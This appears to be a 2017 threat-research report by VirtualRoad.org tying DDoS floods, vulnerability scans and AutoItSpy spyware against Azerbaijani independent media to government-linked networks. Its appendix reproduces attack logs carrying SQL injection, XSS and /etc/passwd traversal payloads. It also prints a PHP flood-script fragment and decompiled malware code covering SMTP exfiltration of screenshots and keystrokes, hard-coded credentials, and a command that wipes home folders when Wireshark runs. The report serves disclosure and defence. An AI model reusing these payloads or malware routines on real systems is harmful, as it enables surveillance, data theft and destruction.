News media websites attacked from Governmental Infrastructure in Azerbaijan

10 February 2017

Ministry of Communications and High Technologies (Azerbaijan)

Ministry of Communications and High Technologies (Azerbaijan).

10 March 2017, 00:01 UTC

Forensic evidence collected by VirtualRoad.org during the past six months shows how a dedicated group of cyber attackers is actively engaged in denial-of-service attacks, intrusion attempts, spear-phishing campaigns and electronic media monitoring from Internet infrastructure associated to the Government of Azerbaijan.

This report summarizes our findings that result from our efforts to repeal and track the attacks.  In January 2017, after tens of denial of service and penetration attempts, the same group started to use the same infrastructure  used by  “AutoItSpy” , a home-grown malware designed to spy and collect information from targeted human rights activists. These overlaps of malicious activities can hardly be explained without considering the existence of a campaign designed to target dissenting voices in the country.

Denial of service attacks against independent media

An example of such cyberattacks took place the 12th of January 2017, when the website www.abzas.net started to receive a serie of application layer denial-of-services attacks that lasted for eight days. During five full consecutive days the website remained inaccessible until it was finally migrated to VirtualRoad.org’s secure hosting infrastructure.

Our forensic investigation links the attackers of the news’ site abzas.net with other security events that we have been monitoring for the past six months. The attackers that targeted Abzas.net, have also been active against other media websites from Azerbaijan including cumhuriyyet.net and azadliq.info.

The attackers, which used compromised servers,  the Tor network infrastructure and “Zenmate” VPN services to orchestrate the traffic floodings, left digital traces that link them with the IP Network 85.132.24.0/24, and more specifically the IP addresses 85.132.24.74 and 85.132.24.77.

In the same IP network, we can find several Azerbaijani governmental services, such as the Ministry of Foreign Affairs (tourvisa.mfa.gov.az @85.132.24.246), the mailserver of the Cabinet of Ministers (mail.cabmin.gov.az @85.132.24.82), and the mailserver of the Ministry of Transport (mail.mot.gov.az @85.132.24.51).

The most probable location of the attacker(s) is the premises of the Ministry of Transport (in Tbilisi Avenue No #1054, Baku, Azerbaijan) since the “non-automated attacks” always take place during office hours. During the writing of this report, we have been informed that on the 13th February 2017, the Ministry of Transport was merged with the High Technologies to form the new Ministry of Transport, Communications and High Technologies.

As a reaction to our attempts to block the denial of service attacks, the source IP address 85.132.24.74, was changed to 85.132.24.77 . Apart from attacking media sites, the same addresses are also used to provide access to the public Internet at the Ministry of Transport, from where legitimate readers  visit the websites on a daily basis.

Also in January 2017, a very distinctive attack was launched against Abzas.net and Azadliq.info. Eleven dedicated servers, all closely connected with system administrators in Azerbaijan, were abused to launch a denial-of-service attack against these media sites. One of the servers used in the attack, with IP address 136.243.173.205, hosts the website Hackaton Azerbaijan.

The site is hosted with Yer.az, a hosting company owned by Rashad Aliyev, a security professional with close ties to Governmental-endorsed cyber-security activities. When we confronted Rashad Aliyev about the attacks and the compromised servers, he acknowledged that the traffic floods were sourced from his server, but argued that due to privacy reasons, he was not able to provide more details about the attacks or who might be behind them.

Monitoring and tracking of news sites

 

During our review of suspicious traffic patterns we also identified what seems to be a “customized service” that monitors and tracks multiple news sites in Azerbaijan. Such service was monitoring  news sites every 15minutes. Most likely, this monitoring system was used to evaluate the success (or failure) of denial-of-services attacks, as they could track when a site become unreachable, and for how long it lasted.

Since VirtualRoad.org hosts several of the targeted sites including Azadliq.info, we decided to block the monitoring system. To avoid our blocking, the attackers changed IP address of their system several times. However, in the morning of the 6th of January 2017, after several failed attempts to re-activate their monitoring system, the attackers decided to move the operations to a new IP  address, namely  85.132.78.164.

IP address 85.132.78.164 – the connection with malware “AutoItSpy”

 

During the review of the malicious activity associated with this specific address, we found several malware samples of what seemed a “homegrown spyware” ex-filtrating data to the same location. Our findings overlap with the report of  Amnesty International researchers about a malware dubbed “AutoItSpy”.

Our analysis of the malicious code also reveals that the attackers were collecting screen shots and logging key strokes from the victims’ computers and submitted them to a server hosted at IP address 85.132.78.164.

 

 

Appendix – Forensic data

Below follows forensic data collected for the denial-of-service attacks, the system monitoring and the targeted malware campaign.

 

DDoS attacks

 

Dedicated Azerbaijani administrated servers used to launch DDoS attacks

One interesting aspect of the DDoS attacks is the nature of the dedicated servers that were used to launch them. In most cases, attackers compromise random websites to place persistent backdoors and the attack generation code that assist them to run web requests floods while remaining untraceable. To our surprise, the attackers placed the malicious code in dedicated servers operated by other Azeri system administrators. This finding make us believe that the attackers are close to the cybersecurity community in Azerbaijan.

 

999_code

CB-Prx Web Flooder from compromised site

 

One of the servers used for the attack hosted the website for the “Hackathon in Azerbaijan”

ctf

Faik Farmanov (IntraNS, TLD .az), Rashad Aliyev (Yer.az) at Hackathon Azerbaijan

 

Not novel attack code

The attack code used to launch the DDOS is written in PHP and it is a modified version of Punker2Bot PHP Flooder. A old script is available here

    $header = "GET ".$ruta." HTTP/1.1\r\n";
    $header .= "Host: ".$dominio."\r\n";
    $header .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\r\n";
    $header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5\r\n";
    $header .= "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    $header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $header .= "Keep-Alive: 310\r\n";
    $header .= "Proxy-Connection: keep-alive\r\n";
    $header .= "Referer: http://".$dominio.$ruta."\r\n";
    $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $header .= "X-Forwarded-For: ".$ip_simulada."\r\n";
    $header .= "Via: CB-Prx\r\n";
    $header .= "Connection: Close\r\n\r\n";

 

 

Traffic Logs and Indicators from Web Floods Events (September 2016 – January 2017)

 

Attack on cumhuriyyet from 85.132.24.74 (GET Flood)

85.132.24.74 - - [09/Sep/2016:10:59:51 +0000] GET / HTTP/1.1 200 149517 [203] - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36 AZ AS29049 International Communication Operator 

85.132.24.74 - - [09/Sep/2016:23:52:30 +0000] GET / HTTP/1.1 403 635 [203] - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36 AZ AS29049 International Communication Operator

Attack on cumhuriyyet from 85.132.24.74 (GET Flood)

85.132.24.74 - - [13/Sep/2016:06:06:42 +0000] GET / HTTP/1.1 403 635 [203] - Mozilla/7.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator

Attack on gununsesi from 85.132.24.74 (GET Flood)

85.132.24.74 - - [17/Sep/2016:17:36:31 +0000] GET / HTTP/1.1 200 73563 [202] - Mozilla/7.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator

Attack on cumhuriyyet from 85.132.24.74 (GET Flood)

85.132.24.74 - - [17/Sep/2016:19:51:24 +0000] GET / HTTP/1.1 403 635 [203] - Mozilla/7.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator

Attack on cumhuriyyet from 85.132.24.74 (GET Flood)

85.132.24.74 - - [27/Oct/2016:06:10:42 +0000] GET / HTTP/1.1 200 153545 [203] - Mozilla/6.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator

 

Attack on cumhuriyyet from 85.132.24.74 (GET Flood)

85.132.24.74 - - [11/Nov/2016:06:13:13 +0000] GET / HTTP/1.1 402 649 [203] - Mozilla/6.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator -

 

Attack on cumhuriyyet from 85.132.24.74 (GET Flood)

85.132.24.74 - - [13/Nov/2016:06:10:15 +0000] GET / HTTP/1.1 403 635 [203] - Mozilla/6.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator -

Attack on cumhuriyyet from 85.132.24.74 (GET Flood)

85.132.24.74 - - [15/Nov/2016:06:08:47 +0000] GET / HTTP/1.1 403 635 [203] - Mozilla/6.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator -
85.132.24.74 - - [15/Nov/2016:21:16:43 +0000] GET / HTTP/1.1 403 232 [109] - Googlebot-News AZ AS29049 International Communication Operator -

Attack on gununsesi from Mirai GRE Traffic

On Sat, 19 Nov 2016 11:08:52 GMT, the Mirai Command and Control Server 154.16.3.145 (q5f2k0evy7go2rax9m4g. dot ru) attacked gununsesi GRE attack. Followed by the Mirai attack, a layer 7 attack was launched against the same site including 1000 bots.

178.172.146.60 - - [19/Nov/2016:12:06:10 +0000] "GET /category/manset/ HTTP/1.1" 403 232 [429] "http://1boi142788p9.ua/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.843328; .NET CLR 3.5.843328; .NET CLR 3.0.843328" "---" "BY" "AS56498 ELSATBR-AS"

 

Pentesting of Azadliq from government server

 

Attack on azadliq from 85.132.24.74 (Pentesting Acunetix)

85.132.24.74 - - [11/Nov/2016:13:51:41 +0000] "GET /acunetix-wvs-test-for-some-inexistent-file HTTP/1.1" 404 9485 [286] "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" 

85.132.24.74 - - [11/Nov/2016:14:02:51 +0000] "GET /?category=96&format=audio&month=01&s=(select%20convert(int%2cCHAR(65)))&year=2016 HTTP/1.1" 200 216 [528] "http://www.azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21"
85.132.24.74 - - [11/Nov/2016:14:02:51 +0000] "GET /?p=/%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd HTTP/1.1" 301 248 [503] "http://www.azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21"
85.132.24.74 - - [11/Nov/2016:16:21:46 +0000] POST /xmlrpc.php HTTP/1.1 200 31 [160540] - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 AZ AS29049 International Communication Operator - 
85.132.24.74 - - [11/Nov/2016:16:21:49 +0000] POST /xmlrpc.php HTTP/1.1 200 31 [628] - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 AZ AS29049 International Communication Operator - 85.132.24.74 - - [11/Nov/2016:16:21:49 +0000] POST /xmlrpc.php HTTP/1.1 200 31 [646] - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 AZ AS29049 International Communication Operator -
85.132.24.74 - - [11/Nov/2016:16:21:49 +0000] POST /xmlrpc.php HTTP/1.1 200 31 [652] - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 AZ AS29049 International Communication Operator

Attack on azadliq from 85.132.24.77 (Pen Testing netsparker)

85.132.24.77 - - [12/Jan/2017:09:23:43 +0000] GET /?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000128)%3C/scRipt%3E HTTP/1.1 303 295 [559] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:45 +0000] GET /%3C?php%20echo%20chr(78).chr(69).chr(84).chr(83).chr(80).chr(65).chr(82).chr(75).chr(45).chr(80).chr(72).chr(80).chr(45).chr(48).chr(45).(44353702950%20(intval($_GET[997])*4567)).chr(45)%20?%3E HTTP/1.1 303 295 [665] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:46 +0000] GET /?nsextt=%3cscRipt%3ens(0x000148)%3c%2fscRipt%3e HTTP/1.1 303 295 [519] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:48 +0000] POST / HTTP/1.1 421 717 [771] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:48 +0000] POST / HTTP/1.1 421 717 [786] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:48 +0000] POST / HTTP/1.1 421 717 [817] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:48 +0000] GET /?nsextt='%22@--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000160)%3C/scRipt%3E HTTP/1.1 303 295 [560] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:49 +0000] POST / HTTP/1.1 421 717 [877] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:51 +0000] GET /wp-includes/?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000162)%3C/scRipt%3E HTTP/1.1 303 295 [571] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:51 +0000] GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd HTTP/1.1 303 295 [548] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:25:48 +0000] GET /wp-content/plugins/?nsextt='%22@--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000AF2)%3C/scRipt%3E HTTP/1.1 303 295 [579] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:25:50 +0000] GET /wp-content/plugins/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000B1C)%3C/scRipt%3E HTTP/1.1 303 295 [570] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:25:51 +0000] GET /wp-content/plugins/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000B1E)%3C/scRipt%3E HTTP/1.1 303 295 [570] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:25:51 +0000] GET /wp-content/plugins/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd HTTP/1.1 303 295 [567] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:25:52 +0000] GET /wp-content/plugins/%22ns=%22netsparker(0x000B28) HTTP/1.1 303 295 [520] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -

 

Botnet Attacks against abzas.net and azadliq.info

Attacks against azadliq.info and abzas.net 12-20 January 2017

136.243.173.205 - - [16/Jan/2017:10:17:57 +0000] "GET /index.php?s=999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999957670 HTTP/1.1" 301 311 [2627] "http://azadliq.info/index.php?s=999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999957670" "Mozilla/5.0 (Windows; U; Windows NT 9.3; ru-ru; rv:1.8.1.16) Gecko/20080702 Firefox/Array.0.0.16" "---" "DE" "AS24940 HETZNER-AS"

 

11 different IPs were involved in the “99999” attacks against the sites, 9 of them overlap.

Azadliq.info attack IPs

108.167.189.55 
136.243.173.205 www.ctf.hackathonazerbaijan.org
178.208.79.65
178.213.128.22 Armenian Hosting

194.28.86.7 
46.17.44.207 azedupress.com
5.9.87.83 ann.az ain.az
66.147.240.195  
78.46.187.22

Abzas.net attack IPs from 12-16 January (old hosting)

108.167.189.55
136.243.173.205 Yer Hosting
178.208.79.65
178.63.54.197 Technote Media Hosting

194.28.86.7
46.17.44.207
5.9.87.83 Technote Media Hosting
66.147.240.195
78.46.187.22

78.46.187.22 - - [20/Jan/2017:14:02:56 +0000] "GET /index.php?s=9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
 99999999999999999999999999999999999999999999999999999999999999999925763 HTTP/1.1" 301 248 [2617] "http://abzas.net/index.php?s=999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999925763" "Mozilla/5.0 (Windows; U; Windows NT 9.3; ru-ru; rv:1.8.1.16) Gecko/20080702 Firefox/Array.0.0.16

Monitoring and tracking news sites

Blocking of monitoring IP address

Change monitoring system from 85.132.24.74 to 85.132.24.77, after monitoring was blocked

 

85.132.24.74 - - [28/Dec/2016:14:00:19 +0000] "GET / HTTP/1.1" 301 311 [223] "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.74 - - [28/Dec/2016:14:00:19 +0000] "GET / HTTP/1.1" 302 287 [258] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.74 - - [28/Dec/2016:14:15:14 +0000] "GET / HTTP/1.1" 301 311 [223] "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.74 - - [28/Dec/2016:14:15:14 +0000] "GET / HTTP/1.1" 302 287 [258] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.77 - - [28/Dec/2016:14:30:13 +0000] "GET / HTTP/1.1" 301 311 [223] "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.77 - - [28/Dec/2016:14:30:13 +0000] "GET / HTTP/1.1" 302 287 [258] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.77 - - [28/Dec/2016:14:45:12 +0000] "GET / HTTP/1.1" 301 311 [223] "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.77 - - [28/Dec/2016:14:45:12 +0000] "GET / HTTP/1.1" 302 287 [258] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"

 

Monitoring system changes to a new IP range. Monitoring moves to the network where mail.surakhani-oil.com and safa.az are hosted. The network is directly connected to the AZ-IX internet exchange via DeltaTelecom-CustomersGW-link-for-INTERNET-Xchange.az-ix.net and in the past hosted the VPN services of az-ix.net vpn.az-ix.net 85.132.78.130

 

85.132.24.77 - - [06/Jan/2017:09:30:02 +0000] "GET / HTTP/1.1" 303 295 [303] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36"
85.132.24.77 - - [06/Jan/2017:09:45:04 +0000] "GET / HTTP/1.1" 303 295 [303] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36"
85.132.24.77 - - [06/Jan/2017:10:00:14 +0000] "GET / HTTP/1.1" 303 295 [303] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36"
85.132.78.164 - - [06/Jan/2017:10:15:56 +0000] "GET / HTTP/1.1" 303 295 [260] "-" "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)"
85.132.78.164 - - [06/Jan/2017:10:16:30 +0000] "GET / HTTP/1.1" 303 295 [260] "-" "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)"

The same network was active pen testing Azadliq.info in April 2016

85.132.78.162 - - [05/Apr/2016:13:02:02 +0000]  "GET /leftnav_bot/ HTTP/1.0" 403 221 [357] "-" "DirBuster-0.12 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)" 
85.132.78.162 - - [05/Apr/2016:13:02:02 +0000]  "GET /1466/ HTTP/1.0" 403 221 [350] "-" "DirBuster-0.12 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)"

Active domains in that network include

vpn.az-ix.net 85.132.78.130
mail1.fincaazerbaijan.com  85.132.78.210
mail.safa.az 85.132.78.150

“AutoItSpy” – Targeted malware collects screen and keyboard captures from victims

Targeted malware in Word document

A few months ago, we were informed of a campaign of targeted malware that was sent as Word Documents . For example, one of the mails included a document with information about “List of Prisoners”. Several other samples of the same malware have been sent in the last months.

prisioners_list

Prisioners List Document containing malware

 

 

The malware collects screen captures of the victim and send them via e-mail to IP address 85.132.78.164. The mail include also the details of hardware and operative system of the victim.
sceenshoot_malware

Examples of such malware are available in Virustotal as early of June 2016:

Virustotal: 4c03d77e0d006fbb1569376971f791df1bafe9448099b7aabd51b2359721447a

Virustotal: df6efa3cb44923487f14a81106e5060eb5b4a4a74d7658ae6214f60ad664c6e5

Other references to similar samples are here

According to Virustotal, the malware has been available in the following locations

http://www.qanun.az/wp-admin/flash_player.scr
http://qanun.az/wp-admin/flash_player.scr
http://qanun.az/wp-admin/user/flash_player_update.scr
http://tia.az/css/responsive/flash_player_update.scr
http://www.qanun.az/wp-admin/user/flash_player_update.scr

When we tried to disassemble the code we got some motivating messages from the attackers! Their encouragement was of great inspiration.yousuck

The AutoIt based code hides the IP address and credentials of the server that collects the screen captures in this part of the disassembled code.

The malware makes several connections to the website http://ietf.org/index.html to verify connectivity with the following user agent.

HttpSetUserAgent("Mozilla/6.0 (Windows NT 23.6; WOWxWow; Trident/33.0;rv:16.0) like Internet Explorer 13 Gecko 13" & Random(1, 10000000, 1)

Our skills improved our self 🙂 Good kung fu… and…. wow! That mail server again

 

$chrmail = Chr(121) & Chr(111) & Chr(120) & Chr(108) & Chr(97) & Chr(110) & Chr(105) & Chr(115) & Chr(64) & Chr(108) & Chr(111) & Chr(99) & Chr(97) & Chr(108) & Chr(46) & Chr(114) & Chr(101) & Chr(109) & Chr(111) & Chr(116) & Chr(101)

$smtpserver = Chr(56) & Chr(53) & Chr(46) & Chr(49) & Chr(51) & Chr(50) & Chr(46) & Chr(55) & Chr(56) & Chr(46) & Chr(49) & Chr(54) & Chr(52)
$fromname = "YTGH 2"
$fromaddress = $chrmail
$toaddress = $chrmail
$subject = Random(1, 100000) & " Eklenti  " & Random(1, 100000)

$username = $chrmail
$password = Chr(121) & Chr(111) & Chr(120) & Chr(108) & Chr(97) & Chr(100) & Chr(97)


$finallog = "Prosessor arx: " & @CPUArch & @CRLF & "OS arx: " & @OSArch & @CRLF & "OS: " & @OSType & @CRLF & "Emeliyyat Sistemi : " & @OSVersion & @CRLF & "Mashininadi: " & @ComputerName & @CRLF & "Cari istifadeci: " & @UserName & @CRLF & "IPadres: " & @IPAddress1 & @CRLF & "IPadres: " & @IPAddress2 & @CRLF & "IPadres: " & @IPAddress3 & @CRLF & "IPadres: " & @IPAddress4 & @CRLF & "Ischi masanin Width-i: " & @DesktopWidth & @CRLF & "Desktop Height: " & @DesktopHeight & @CRLF & $finalipadresses & @CRLF

$tarixisaatpc = "Vaxt: " & @HOUR & ":" & @MIN & " " & "[" & @MDAY & "/" & @MON & "/" & @YEAR & "]" & @CRLF & "Unik@l ID: " & $unikalid & @CRLF

 

Detecting the presence of wireshark collecting network traffic. Wow! This is nasty, deleting all my home folder. Why do you Sleep(800) after that?

If ProcessExists("wireshark.exe") OR ProcessExists("dumpcap.exe") OR ProcessExists("tshark.exe") OR ProcessExists("wireshark-gtk.exe") Then
		Run(@ComSpec & " /c rmdir /q /s %homedrive%", @ScriptDir, @SW_HIDE)
		Run(@ComSpec & " /c rmdir /q /s %homepath%", @ScriptDir, @SW_HIDE)
		Sleep(800)
	Next
	MsgBox(64, "Error", "Error", 2)
	Exit
EndIf

Process servicepool.exe contains a key logger that stores key strokes in the file Thumbs-*.txt. The screen captures (*.jpg) and key strokes (Thumbs-*.txt) are sent as file attachments.

 

$tarixi = @HOUR & "_" & @MIN & "_" & @SEC & "_" & "-" & @MDAY & "_" & @MON & "_" & @YEAR
FileWrite($wheretostay & "\Thumbs-" & $tarixi & ".txt", $dataz & @CRLF)

 

The variable $smtpserver contains the IP of the SMTP server 85.132.78.164. A full copy of the AutoIT source code is here and here

Using a mail server in the Government network to collect the screen captures

Screen captures are sent to a mail server at 85.132.78.164 using the account “yoxlanis@local.remote pass: yoxlada” yoxlanış yoxlana

220 WIN-RL76B2OKD4G ESMTP
EHLO lc9Y6kl23Y
250-WIN-RL76B2OKD4G
250-SIZE 20480000
250-AUTH LOGIN
250 HELP
AUTH LOGIN
334 VXNlcm5hbWU6
eW94bGFuaXNAbG9jYWwucmVtb3Rl   <- yoxlanis@local.remote
334 UGFzc3dvcmQ6
eW94bGFkYQ== <- yoxlada
235 authenticated.
MAIL FROM: <yoxlanis@local.remote>
250 OK
RCPT TO: <yoxlanis@local.remote>
250 OK
DATA
354 OK, send.
thread-index: AdKBpWrF3z6LUmH6RrW3/vcKOLUm0Q==
